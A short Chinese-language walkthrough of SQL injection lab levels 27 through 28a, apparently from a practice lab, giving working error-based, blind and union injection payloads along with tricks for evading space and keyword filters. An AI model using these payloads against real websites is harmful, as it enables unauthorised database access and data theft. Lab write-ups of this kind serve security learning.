第二十七关:
这关禁用了空格和select,空格还是可以使用()代替,select发现可以大小写绕过
输入?id=1'||extractvalue(1,concat(0x5c,(selEct(group_concat(schema_name))from(information_schema.schemata))))||'1'='1
这里还有个问题就是,空格被过滤了,貌似不能使用联合注入了。网上有人说可以使用%0a ,是可以的
还可以使用内联注释的/*! content */ 但是这关过滤了/* 所以不行,不过我在第一关中尝试了 是可以的
第二十七a关:
和第二十七关一样,只是需要将报错注入改成盲注。
输入?id="||substr((seLEct(user())),1,1)="r
使用延时的盲注如下
输入:?id="||if((substr((seLEct(user())),1,1)="r"),sleep(1),1)||"2"="1
第二十八关:
先看源码
s代表先去掉多有空格,报错%0a,/i表示忽略大小写。
可以输入?id=0')union(select%0d1,database(),'3
第二十八a关:
比二十八关的过滤还少些,就不多说了。直接使用上面的expload就行。